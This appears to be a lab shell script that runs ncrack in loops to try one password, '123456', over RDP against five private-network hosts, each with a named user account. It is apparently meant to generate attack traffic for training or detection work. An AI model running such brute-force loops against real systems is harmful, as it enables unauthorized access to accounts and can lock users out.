#!/bin/bash

cd /winattacklab/

echo "=========================="
echo "RDP attack"
echo "=========================="
sleep 1

echo "launching RDP attack"
for (( i=0; i<10; ++i)); do
    ncrack -v 10.0.1.10 --user john --pass 123456 -p rdp CL=1
done

for (( i=0; i<10; ++i)); do
    ncrack -v 10.0.1.100 --user ibuetler --pass 123456 -p rdp CL=1
done

for (( i=0; i<10; ++i)); do
    ncrack -v 10.0.1.101 --user adiener --pass 123456 -p rdp CL=1
done

for (( i=0; i<10; ++i)); do
    ncrack -v 10.0.1.102 --user bgates --pass 123456 -p rdp CL=1
done

for (( i=0; i<10; ++i)); do
    ncrack -v 10.0.1.103 --user emusk --pass 123456 -p rdp CL=1
done

